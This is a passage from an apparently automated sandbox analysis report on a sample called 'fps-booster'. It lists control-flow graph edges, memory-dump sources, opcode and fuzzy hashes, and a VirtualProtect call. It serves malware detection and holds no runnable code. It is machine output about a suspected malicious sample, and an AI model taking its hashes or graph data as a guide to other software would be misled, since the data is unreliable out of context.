b2fb2ca-b2fb2d2 1015->1019 1016->1009 1024 b2fb268-b2fb26b 1017->1024 1025 b2fb255-b2fb25c 1017->1025 1018->1024 1026 b2fb2d4-b2fb2dc 1019->1026 1020->1026 1035 b2fb2bf-b2fb2c6 1020->1035 1029 b2fb2b8-b2fb2bb 1021->1029 1030 b2fb2a5-b2fb2b6 1021->1030 1025->1018 1033 b2fb2de-b2fb2e7 1026->1033 1034 b2fb318-b2fb320 1026->1034 1039 b2fb2b7 1030->1039 1036 b2fb30c-b2fb316 1033->1036 1037 b2fb2e9-b2fb2f3 1033->1037 1034->1039 1040 b2fb322-b2fb32c 1034->1040 1035->1015 1036->1034 1043 b2fb308-b2fb30b 1037->1043 1044 b2fb2f5-b2fb306 1037->1044 1039->1029 1041 b2fb32e-b2fb337 1040->1041 1042 b2fb368-b2fb37c 1040->1042 1045 b2fb35c-b2fb366 1041->1045 1046 b2fb339-b2fb343 1041->1046 1047 b2fb37e-b2fb387 1042->1047 1048 b2fb3b8-b2fb3cc 1042->1048 1044->1043 1045->1042 1050 b2fb358-b2fb35b 1046->1050 1051 b2fb345-b2fb356 1046->1051 1055 b2fb3ac-b2fb3b6 1047->1055 1056 b2fb389-b2fb393 1047->1056 1052 b2fb3ce-b2fb3d7 1048->1052 1053 b2fb408-b2fb41c 1048->1053 1051->1050 1057 b2fb3fc-b2fb406 1052->1057 1058 b2fb3d9-b2fb3e3 1052->1058 1062 b2fb41e-b2fb427 1053->1062 1063 b2fb458-b2fb46c 1053->1063 1055->1048 1060 b2fb3a8-b2fb3ab 1056->1060 1061 b2fb395-b2fb3a6 1056->1061 1057->1053 1066 b2fb3f8-b2fb3fb 1058->1066 1067 b2fb3e5-b2fb3f6 1058->1067 1061->1060 1070 b2fb44c-b2fb456 1062->1070 1071 b2fb429-b2fb433 1062->1071 1068 b2fb46e-b2fb477 1063->1068 1069 b2fb4a8-b2fb4d1 1063->1069 1067->1066 1074 b2fb49c-b2fb4a6 1068->1074 1075 b2fb479-b2fb483 1068->1075 1085 b2fb4d4 1069->1085 1070->1063 1072 b2fb448-b2fb44b 1071->1072 1073 b2fb435-b2fb446 1071->1073 1073->1072 1074->1069 1081 b2fb498-b2fb49b 1075->1081 1082 b2fb485-b2fb496 1075->1082 1082->1081 1086 b2fb4d9-b2fb4e8 1085->1086 1088 b2fb4ea 1086->1088 1089 b2fb512-b2fb51b 1086->1089 1088->1085 1088->1089 1090 b2fb57f 1088->1090 1091 b2fb5bb-b2fb5c1 1088->1091 1092 b2fb566-b2fb578 call b2f6418 1088->1092 1093 b2fb5a5-b2fb5ae 1088->1093 1094 b2fb503-b2fb50c 1088->1094 1095 b2fb543 1088->1095 1096 b2fb582 1088->1096 1097 b2fb4f1-b2fb501 1088->1097 1098 b2fb5c2-b2fb5c7 1089->1098 1099 b2fb521-b2fb541 1089->1099 1090->1096 1100 b2fb548-b2fb55d 1092->1100 1093->1089 1103 b2fb5b4-b2fb5b9 1093->1103 1094->1089 1094->1103 1095->1100 1102 b2fb587-b2fb59c 1096->1102 1097->1086 1099->1090 1099->1095 1100->1090 1104 b2fb55f 1100->1104 1102->1091 1106 b2fb59e 1102->1106 1103->1102 1104->1090 1104->1091 1104->1092 1104->1093 1104->1095 1104->1096 1106->1091 1106->1093 1106->1096
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID: WMa
              • API String ID: 0-1036933573
              • Opcode ID: d72339754f9156d3de0959d1fe20964fb589fd5c340a6dcd39894ceb284ec0c5
              • Instruction ID: c63a735f02d85ed7da62910d01febed9196ada19c19920dde79405b90580b49a
              • Opcode Fuzzy Hash: d72339754f9156d3de0959d1fe20964fb589fd5c340a6dcd39894ceb284ec0c5
              • Instruction Fuzzy Hash: 6802A620B193868FD7169778C9A8B667BB25F82344F5984F7C544CF2D6DA24CC0AC752
              Function 0133D100 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1110 133d100-133d180 VirtualProtect 1112 133d182-133d188 1110->1112 1113 133d189-133d1aa 1110->1113 1112->1113
              APIs
              • VirtualProtect.KERNEL32(?,?,?,?), ref: 0133D173
              Memory Dump Source
              • Source File: 00000000.00000002.2484301401.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1330000_fps-booster.jbxd
              Similarity
              • API ID: ProtectVirtual
              • String ID:
              • API String ID: 544645111-0
              • Opcode ID: 8cbd0410719037e6c0bcd9122655fab8c11361f1382aa1e49dc440a64a30d52a
              • Instruction ID: 8583998b2542169a3fcb92f2064b040a716c263cf51343494421ad817e659171
              • Opcode Fuzzy Hash: 8cbd0410719037e6c0bcd9122655fab8c11361f1382aa1e49dc440a64a30d52a
              • Instruction Fuzzy Hash: F421D3B5D006499FDB10CF9AC884BDEFBF4EB48320F108429E958A7250D378A544CFA5
              Function 0B2F0C70 Relevance: .4, Instructions: 413COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1683 b2f0c70-b2f0c7d 1684 b2f0c7f-b2f0c83 1683->1684 1685 b2f0ca7-b2f0cce 1683->1685 1686 b2f0cd6-b2f0d4f 1684->1686 1687 b2f0c85-b2f0c95 1684->1687 1685->1686 1700 b2f1139-b2f114c 1686->1700 1701 b2f0d55-b2f0d72 1686->1701 1691 b2f0c97-b2f0c9d 1687->1691 1692 b2f0ca0-b2f0ca6 1687->1692 1691->1692 1704 b2f114e-b2f1182 1700->1704 1705 b2f1183-b2f1184 1700->1705 1706 b2f0d79-b2f0d80 1701->1706 1707 b2f0d74 1701->1707 1704->1705 1723 b2f1186 1704->1723 1710 b2f118c-b2f1198 1705->1710 1706->1700 1709 b2f0d86-b2f0d9e 1706->1709 1708 b2f112f-b2f1136 1707->1708 1709->1700 1717 b2f0da4-b2f0dbd 1709->1717 1714 b2f119a-b2f119c 1710->1714 1715 b2f11a4-b2f11b4 1710->1715 1714->1715 1721 b2f0dbf 1717->1721 1722 b2f0dc4-b2f0dc8 1717->1722 1721->1708 1722->1700 1724 b2f0dce-b2f0deb 1722->1724 1723->1710 1724->1700 1727 b2f0df1-b2f0e14 1724->1727 1730 b2f0e5d-b2f0e64 1727->1730 1731 b2f0e16-b2f0e1b 1727->1731 1732 b2f0e66-b2f0e6d 1730->1732 1733 b2f0e84-b2f0e86 1730->1733 1734 b2f0e1d-b2f0e27 1731->1734 1735 b2f0e29 1731->1735 1736 b2f0e6f-b2f0e74 1732->1736 1737 b2f0e76-b2f0e82 1732->1737 1738 b2f0e8c-b2f0eb5 1733->1738 1739 b2f0e2e-b2f0e30 1734->1739 1735->1739 1736->1738 1737->1738 1747 b2f0ebb-b2f0ec4 1738->1747 1748 b2f1086-b2f108a 1738->1748 1740 b2f0e58 1739->1740 1741 b2f0e32-b2f0e36 1739->1741 1740->1708 1741->1700 1742 b2f0e3c-b2f0e41 1741->1742 1742->1740 1745 b2f0e43-b2f0e56 1742->1745 1745->1730 1745->1740 1747->1700 1750 b2f0eca-b2f0ee3 1747->1750 1751 b2f110e-b2f1115 1748->1751 1752 b2f1090-b2f1095 1748->1752 1750->1700 1759 b2f0ee9-b2f0f02 1750->1759 1755 b2f1117-b2f1120 1751->1755 1756 b2f1124-b2f1127 1751->1756 1753 b2f1097-b2f10a1 1752->1753 1754 b2f10a3 1752->1754 1758 b2f10a8-b2f10aa 1753->1758 1754->1758 1755->1756 1763 b2f1122 1755->1763 1756->1708 1760 b2f10ac-b2f10be 1758->1760 1761 b2f10c0-b2f10d3 1758->1761 1759->1700 1767 b2f0f08-b2f0f38 1759->1767 1760->1761 1768 b2f10d5-b2f10ee 1760->1768 1761->1751 1763->1708 1778 b2f0f3a-b2f0f3e 1767->1778 1779 b2f0f57 1767->1779 1768->1751 1772 b2f10f0-b2f110a 1768->1772 1772->1751 1778->1700 1780 b2f0f44-b2f0f55 1778->1780 1781 b2f0f59-b2f0f5b 1779->1781 1780->1781 1782 b2f1074-b2f1080 1781->1782 1783 b2f0f61-b2f0f70 1781->1783 1782->1747 1782->1748 1786 b2f0fcb-b2f0fd8 1783->1786 1787 b2f0f72-b2f0f81 1783->1787 1794 b2f0fdf-b2f0fe1 1786->1794 1790 b2f101f-b2f1021 1787->1790 1791 b2f0f87-b2f0f96 1787->1791 1792 b2f1027 1790->1792 1793 b2f1023-b2f1025 1790->1793 1799 b2f0f9c-b2f0fab 1791->1799 1800 b2f103b-b2f1045 1791->1800 1796 b2f102d-b2f1039 1792->1796 1793->1796 1797 b2f0ff4-b2f1003 1794->1797 1798 b2f0fe3-b2f0ff2 1794->1798 1796->1782 1801 b2f100d-b2f101d 1797->1801 1798->1797 1798->1801 1806 b2f106a-b2f106e 1799->1806 1807 b2f0fb1-b2f0fc0 1799->1807 1800->1782 1808 b2f1047-b2f1068 1800->1808 1801->1782 1806->1782 1811 b2f0fc6 1807->1811 1812 b2f1070 1807->1812 1808->1782 1811->1782 1812->1782
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 59cb4e825c645c7433b70d3e1f566fcf73cb25fd7c8befecb57a3c487eaa1cf9
              • Instruction ID: ac0abc854371972e23f0a262891693ee7b7c80d28341fbf582ecc2f4f441d931
              • Opcode Fuzzy Hash: 59cb4e825c645c7433b70d3e1f566fcf73cb25fd7c8befecb57a3c487eaa1cf9
              • Instruction Fuzzy Hash: CAF1EF30A11247CFDB18DF64C490B6AFBF2AF85304F54856DCA06AB386DB75E846CB91
              Function 0B2F3E40 Relevance: .3, Instructions: 349COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1814 b2f3e40-b2f3e5f 1815 b2f3e65-b2f3e7f 1814->1815 1816 b2f3f92-b2f3fe8 1814->1816 1886 b2f3e81 call b2f3e31 1815->1886 1887 b2f3e81 call b2f3e40 1815->1887 1829 b2f3fea-b2f3ff7 1816->1829 1830 b2f4037-b2f403c 1816->1830 1818 b2f3e87-b2f3e93 1821 b2f3eac-b2f3eb1 1818->1821 1822 b2f3e95-b2f3eaa 1818->1822 1823 b2f3ec0-b2f3ee3 1821->1823 1822->1821 1831 b2f3eb3-b2f3ebd 1822->1831 1836 b2f3eeb-b2f3f01 call b2f4850 1823->1836 1837 b2f3ee5-b2f3ee8 1823->1837 1834 b2f3fff-b2f4009 1829->1834 1835 b2f3ff9 1829->1835 1833 b2f403e-b2f4044 1830->1833 1831->1823 1838 b2f408e-b2f4091 1833->1838 1839 b2f4046-b2f4069 1833->1839 1834->1830 1846 b2f400b-b2f4015 1834->1846 1835->1834 1855 b2f3f07-b2f3f0d 1836->1855 1837->1836 1841 b2f4095-b2f409b 1838->1841 1839->1838 1843 b2f406b-b2f408c 1839->1843 1844 b2f409d-b2f40bc 1841->1844 1845 b2f40e1-b2f40e6 1841->1845 1843->1841 1844->1845 1848 b2f40be-b2f40df 1844->1848 1851 b2f40ea-b2f40f3 1845->1851 1849 b2f401d-b2f4035 1846->1849 1850 b2f4017 1846->1850 1848->1851 1849->1833 1850->1849 1853 b2f40f5-b2f4117 1851->1853 1854 b2f4142-b2f4148 1851->1854 1853->1854 1858 b2f4119-b2f4140 1853->1858 1859 b2f414c-b2f4150 1854->1859 1860 b2f3f0f-b2f3f2f 1855->1860 1861 b2f3f3a-b2f3f8f 1855->1861 1858->1859 1862 b2f41bc-b2f41c2 1859->1862 1863 b2f4152-b2f418c 1859->1863 1860->1861 1865 b2f41c6-b2f41ca 1862->1865 1863->1862 1869 b2f418e-b2f41ba 1863->1869 1870 b2f41fc-b2f4201 1865->1870 1871 b2f41cc-b2f41dc 1865->1871 1869->1865 1874 b2f4203-b2f4214 1870->1874 1871->1870 1876 b2f41de-b2f41fa 1871->1876 1878 b2f423f-b2f4246 1874->1878 1879 b2f4216-b2f421a 1874->1879 1876->1874 1879->1878 1880 b2f421c-b2f422b 1879->1880 1880->1878 1884 b2f422d-b2f4231 1880->1884 1885 b2f4237 1884->1885 1885->1878 1886->1818 1887->1818
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a1f6fd4c149fc0e7bc68f262b26d0c4357f5f253eaaabe3fdebd254bb400b73a
              • Instruction ID: 4c517da1b142e2a21433b40d9514e99781f3a4c9a825200818c5e20c596c55ef
              • Opcode Fuzzy Hash: a1f6fd4c149fc0e7bc68f262b26d0c4357f5f253eaaabe3fdebd254bb400b73a
              • Instruction Fuzzy Hash: 80E18E75A102068FCB05DF68C584AAEBBF2FF49300F1582A9E915AB365EB70ED45CB50
              Function 0B2F31B0 Relevance: .3, Instructions: 304COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1889 b2f31b0-b2f31dd 1890 b2f31df-b2f31ed 1889->1890 1891 b2f317d-b2f319c 1889->1891 1893 b2f31f3-b2f31f7 1890->1893 1894 b2f32e0-b2f331d 1890->1894 1895 b2f31fd-b2f3201 1893->1895 1896 b2f3324-b2f3361 1893->1896 1894->1896 1897 b2f3368-b2f33bb 1895->1897 1898 b2f3207-b2f320a 1895->1898 1896->1897 1923 b2f33c5-b2f33cb call b2f39d8 1897->1923 1901 b2f320f-b2f3226 1898->1901 1902 b2f320c 1898->1902 1908 b2f3228-b2f3240 1901->1908 1909 b2f3242-b2f325d 1901->1909 1902->1901 1908->1909 1916 b2f325f 1909->1916 1917 b2f3269-b2f3281 1909->1917 1916->1917 1925 b2f328d-b2f32dd 1917->1925 1926 b2f3283 1917->1926 1927 b2f33d1-b2f3447 1923->1927 1926->1925 1941 b2f3451-b2f3454 1927->1941 1942 b2f345d-b2f35d3 1941->1942
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cbcddfd401208913081b906d3b315db93b2042364115b3113d496f76a09d347c
              • Instruction ID: 5bfb56cfb539f7fb9fd728cdc4746257b5c34a215825386f08ca4b674087ff55
              • Opcode Fuzzy Hash: cbcddfd401208913081b906d3b315db93b2042364115b3113d496f76a09d347c
              • Instruction Fuzzy Hash: 5BC16330A04219DFDB05EFA8D8A4AAEBFB2FF99300F104569E505AB395DF385D05CB61
              Function 0B2F4D29 Relevance: .2, Instructions: 249COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 53f03f3c17f3a5daa7f9ad9c28afed86fac10ab5cfb5ddb5c62e63a39339c32b
              • Instruction ID: c5bee9cfd44e1c2bdefcb1439084c77f142208119bd2ed824cd4f4b3551b92b0
              • Opcode Fuzzy Hash: 53f03f3c17f3a5daa7f9ad9c28afed86fac10ab5cfb5ddb5c62e63a39339c32b
              • Instruction Fuzzy Hash: 9591C1307287128FD725AB68D5D4B2AFBB2EF54700F10856AD6538B785CBF4E842CB51
              Function 0B2F2A6B Relevance: .2, Instructions: 234COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2193 b2f2a6b-b2f2a6e 2194 b2f2ae5-b2f2ae7 2193->2194 2195 b2f2a70-b2f2a8d 2193->2195 2196 b2f2aff-b2f2b01 2194->2196 2197 b2f2ae9-b2f2aef 2194->2197 2205 b2f2a8f-b2f2a9b 2195->2205 2206 b2f2aad-b2f2ab7 2195->2206 2201 b2f2b08-b2f2b0a 2196->2201 2198 b2f2af3-b2f2af5 2197->2198 2199 b2f2af1 2197->2199 2198->2196 2199->2196 2202 b2f2b0c-b2f2b0e 2201->2202 2203 b2f2b1b 2201->2203 2207 b2f2b12-b2f2b14 2202->2207 2208 b2f2b10 2202->2208 2209 b2f2d6e-b2f2d75 2203->2209 2213 b2f2a9f-b2f2aa1 2205->2213 2214 b2f2a9d 2205->2214 2210 b2f2ab9-b2f2abb 2206->2210 2211 b2f2ac5-b2f2ad9 2206->2211 2207->2203 2208->2203 2210->2211 2218 b2f2adb 2211->2218 2219 b2f2b20-b2f2b2c 2211->2219 2216 b2f2aa8 2213->2216 2214->2216 2216->2209 2218->2194 2221 b2f2c0e-b2f2c1a 2219->2221 2222 b2f2b32-b2f2b4a 2219->2222 2225 b2f2d4f-b2f2d59 2221->2225 2226 b2f2c20-b2f2c34 2221->2226 2222->2221 2230 b2f2b50-b2f2b5e 2222->2230 2228 b2f2d5b-b2f2d5d 2225->2228 2229 b2f2d67 2225->2229 2226->2225 2234 b2f2c3a 2226->2234 2228->2229 2229->2209 2235 b2f2d76-b2f2d7e 2230->2235 2236 b2f2b64-b2f2b69 2230->2236 2237 b2f2d0d-b2f2d19 2234->2237 2238 b2f2ccb-b2f2cd7 2234->2238 2239 b2f2c86-b2f2c92 2234->2239 2240 b2f2c41-b2f2c4d 2234->2240 2241 b2f2b6b-b2f2b71 2236->2241 2242 b2f2b81-b2f2bc7 2236->2242 2255 b2f2d1b-b2f2d23 2237->2255 2256 b2f2d31-b2f2d3c 2237->2256 2257 b2f2cef-b2f2cfa 2238->2257 2258 b2f2cd9-b2f2ce1 2238->2258 2251 b2f2caa-b2f2cb5 2239->2251 2252 b2f2c94-b2f2c9c 2239->2252 2253 b2f2c4f-b2f2c57 2240->2253 2254 b2f2c65-b2f2c70 2240->2254 2244 b2f2b75-b2f2b7f 2241->2244 2245 b2f2b73 2241->2245 2242->2221 2284 b2f2bc9-b2f2bd5 2242->2284 2244->2242 2245->2242 2271 b2f2cb7-b2f2cbb 2251->2271 2272 b2f2cc6 2251->2272 2252->2251 2253->2254 2274 b2f2c72-b2f2c76 2254->2274 2275 b2f2c81 2254->2275 2255->2256 2276 b2f2d3e-b2f2d42 2256->2276 2277 b2f2d4d 2256->2277 2269 b2f2cfc-b2f2d00 2257->2269 2270 b2f2d0b 2257->2270 2258->2257 2269->2270 2270->2209 2271->2272 2272->2209 2274->2275 2275->2209 2276->2277 2277->2209 2286 b2f2bed-b2f2bf8 2284->2286 2287 b2f2bd7-b2f2bdd 2284->2287 2291 b2f2bfa-b2f2bfc 2286->2291 2292 b2f2c09 2286->2292 2288 b2f2bdf 2287->2288 2289 b2f2be1-b2f2be3 2287->2289 2288->2286 2289->2286 2293 b2f2bfe 2291->2293 2294 b2f2c00-b2f2c02 2291->2294 2292->2209 2293->2292 2294->2292
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 31231cf09860021927c8ab52d90dedf5020fda55f2c112bcd94f2baafd20a04b
              • Instruction ID: f8a22bdd5453567c4300731f121bd03107e7873c6355c4de9ffabd972c552a98
              • Opcode Fuzzy Hash: 31231cf09860021927c8ab52d90dedf5020fda55f2c112bcd94f2baafd20a04b
              • Instruction Fuzzy Hash: CB714634B20207CFDB259A79C4E463AB6E6AFCBA50715447AF716CB3E8EE64CC018751
              Function 0B2F3AD8 Relevance: .2, Instructions: 232COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2295 b2f3ad8-b2f3ae3 2296 b2f3ae5-b2f3af9 2295->2296 2297 b2f3b21-b2f3c9c 2295->2297 2300 b2f3afb 2296->2300 2301 b2f3b05-b2f3b20 2296->2301 2309 b2f3c9e-b2f3cf6 2297->2309 2310 b2f3cf0-b2f3cf6 2297->2310 2300->2301 2311 b2f3cfe-b2f3d0f 2309->2311 2310->2311
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 136ef6450ae146602493b89aadc789024d35eee5eaae1f2a281a894729e6f069
              • Instruction ID: dc83913a6150c05d766fdbdad0433ed54d94868f204f2323597123c1c2e0eac4
              • Opcode Fuzzy Hash: 136ef6450ae146602493b89aadc789024d35eee5eaae1f2a281a894729e6f069
              • Instruction Fuzzy Hash: A951A13150E3808FCB07DF68D8E09953FB1AF4760071959EBC485CF2B7D629A909CB62
              Function 0B2F4850 Relevance: .2, Instructions: 222COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2316 b2f4850-b2f4882 2317 b2f4888-b2f4897 2316->2317 2318 b2f4a56-b2f4aad 2316->2318 2321 b2f489d-b2f48ac 2317->2321 2322 b2f4899-b2f489b 2317->2322 2332 b2f4aaf-b2f4ab1 2318->2332 2333 b2f4ab3-b2f4ab5 2318->2333 2324 b2f48ae-b2f48d0 2321->2324 2322->2324 2330 b2f4902-b2f4906 2324->2330 2331 b2f48d2-b2f48e1 2324->2331 2334 b2f492c-b2f4942 2330->2334 2335 b2f4908-b2f4915 2330->2335 2389 b2f48e3 call b2f4b48 2331->2389 2390 b2f48e3 call b2f4b21 2331->2390 2336 b2f4b0a-b2f4b10 2332->2336 2337 b2f4abb 2333->2337 2338 b2f4ab7-b2f4ab9 2333->2338 2349 b2f4944-b2f494a 2334->2349 2335->2334 2346 b2f4917-b2f492a 2335->2346 2339 b2f4abe-b2f4ac0 2337->2339 2338->2339 2342 b2f4ac7-b2f4ac9 2339->2342 2343 b2f4ac2-b2f4ac5 2339->2343 2340 b2f48e9-b2f48eb 2340->2330 2345 b2f48ed-b2f48ef 2340->2345 2347 b2f4acf 2342->2347 2348 b2f4acb-b2f4acd 2342->2348 2343->2336 2350 b2f48fb-b2f48fd 2345->2350 2351 b2f48f1-b2f48f5 2345->2351 2346->2349 2352 b2f4ad2-b2f4ad4 2347->2352 2348->2352 2353 b2f494c-b2f4958 2349->2353 2354 b2f4977-b2f4979 2349->2354 2356 b2f4a4a-b2f4a53 2350->2356 2351->2350 2355 b2f49bb-b2f4a17 2351->2355 2358 b2f4adb-b2f4add 2352->2358 2359 b2f4ad6-b2f4ad9 2352->2359 2353->2354 2365 b2f495a-b2f4967 2353->2365 2354->2356 2391 b2f4a19 call b2f5e3a 2355->2391 2392 b2f4a19 call b2f5e22 2355->2392 2393 b2f4a19 call b2f5ed0 2355->2393 2358->2336 2360 b2f4adf-b2f4ae4 2358->2360 2359->2336 2363 b2f4aea-b2f4afb 2360->2363 2364 b2f4ae6-b2f4ae8 2360->2364 2370 b2f4afd-b2f4aff 2363->2370 2371 b2f4b01-b2f4b06 2363->2371 2364->2336 2372 b2f497e-b2f49b4 2365->2372 2373 b2f4969-b2f4975 2365->2373 2370->2336 2371->2336 2374 b2f4b08 2371->2374 2372->2355 2373->2354 2373->2365 2374->2336 2382 b2f4a1f-b2f4a21 2384 b2f4a3c-b2f4a45 2382->2384 2385 b2f4a23-b2f4a3a 2382->2385 2384->2356 2385->2356 2389->2340 2390->2340 2391->2382 2392->2382 2393->2382
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7b05ce7a0bf243ba2947ec6fe636c85ae188bc86382e6b76582df46cc1f58a3d
              • Instruction ID: 5adbede588deaca555782b97075b8442874231142c43c07f13c7ef7b8e93b6ab
              • Opcode Fuzzy Hash: 7b05ce7a0bf243ba2947ec6fe636c85ae188bc86382e6b76582df46cc1f58a3d
              • Instruction Fuzzy Hash: 63815D31B102159FDB14EF79D894BAEBBF6FF88A10F158069E915DB3A1DA709C01CB90
              Function 0B2F0448 Relevance: .2, Instructions: 196COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2394 b2f0448-b2f0465 2395 b2f046d-b2f047d 2394->2395 2397 b2f047f-b2f048a 2395->2397 2398 b2f048b-b2f04b1 2395->2398 2402 b2f04b3-b2f04bf 2398->2402 2403 b2f04c0-b2f0532 2398->2403 2411 b2f0548-b2f055c 2403->2411 2412 b2f0534-b2f053a 2403->2412 2414 b2f0563-b2f0591 2411->2414 2413 b2f053c-b2f0547 2412->2413 2412->2414 2417 b2f0597-b2f05ba 2414->2417 2418 b2f0615-b2f061e 2414->2418 2421 b2f061f-b2f064a 2417->2421 2422 b2f05bc-b2f05c2 2417->2422 2422->2418 2423 b2f05c4 2422->2423 2425 b2f05c7-b2f05ca 2423->2425 2425->2421 2426 b2f05cc-b2f05db 2425->2426 2427 b2f05ff-b2f0605 2426->2427 2428 b2f05dd-b2f05f4 2426->2428 2427->2421 2429 b2f0607-b2f0613 2427->2429 2428->2427 2431 b2f05f6-b2f05fe 2428->2431 2429->2418 2429->2425
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 18dcfbf487801a370b12d187151688c1d56892c8015d224e8f3bb46b00e0b6d4
              • Instruction ID: d02c0578c6bd744236b60a99f6e7366c0abccb3b2308a6367b6c42892706be79
              • Opcode Fuzzy Hash: 18dcfbf487801a370b12d187151688c1d56892c8015d224e8f3bb46b00e0b6d4
              • Instruction Fuzzy Hash: 28612631F052528FCB11DF68D48099EFBB1FF89210B1586AAD569DB682CB30ED06CB91
              Function 0B2F5E22 Relevance: .2, Instructions: 175COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 2432 b2f5e22-b2f5e29 2433 b2f5e2b-b2f5e36 2432->2433 2434 b2f5e46-b2f5e80 2432->2434 2438 b2f5e93-b2f5ec0 2434->2438 2439 b2f5e82-b2f5e90 2434->2439 2445 b2f5f3b 2438->2445 2446 b2f5ec2-b2f5ecb 2438->2446 2447 b2f5f3f-b2f5f41 2445->2447 2448 b2f5ecc-b2f5ef0 2446->2448 2447->2448 2449 b2f5f42-b2f5f49 2447->2449 2454 b2f5ef8-b2f5efe 2448->2454 2452 b2f5f4b-b2f5f5c 2449->2452 2453 b2f5f78-b2f5fa4 2449->2453 2455 b2f5f5e-b2f5f60 2452->2455 2456 b2f5f62-b2f5f64 2452->2456 2477 b2f5fb7-b2f5fc0 2453->2477 2478 b2f5fa6-b2f5fb4 call b2f5c98 2453->2478 2457 b2f5fcb-b2f5fcf 2454->2457 2458 b2f5f04-b2f5f0f 2454->2458 2459 b2f5f69-b2f5f75 2455->2459 2456->2459 2460 b2f5ff7-b2f5ffb 2457->2460 2461 b2f5fd1-b2f5fd3 2457->2461 2458->2457 2467 b2f5f15-b2f5f19 2458->2467 2459->2453 2463 b2f5ffd-b2f6023 2460->2463 2464 b2f602b-b2f6036 2460->2464 2461->2460 2465 b2f5fd5-b2f5fef 2461->2465 2463->2464 2465->2460 2467->2457 2470 b2f5f1f-b2f5f29 2467->2470 2473 b2f5f2b-b2f5f34 2470->2473 2474 b2f5f36-b2f5f3c 2470->2474 2473->2447 2474->2447 2477->2457 2478->2477
              Memory Dump Source
              • Source File: 00000000.00000002.2493943359.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_b2f0000_fps-booster.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf4c41be47f53f995691047aec0aa4dd5cd9ce10a437abbfcdc27cbd3a9edef2
              • Instruction ID: e9e3d466c5fdf46229bddd4fa87cb23bddf92553a88cfd595f10b4087fc2e510
              • Opcode Fuzzy Hash: cf4c41be47f53f995691047aec0aa4dd5cd9ce10a437abbfcdc27cbd3a9edef2
              • Instruction Fuzzy Hash: 3E61E134A1020B9FCB15DF68C494AAEBFF2FF99310F104569EA059B391DB349941CB90
              Function 0B2F5E3A Relevance: .2, Instructions: 157COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
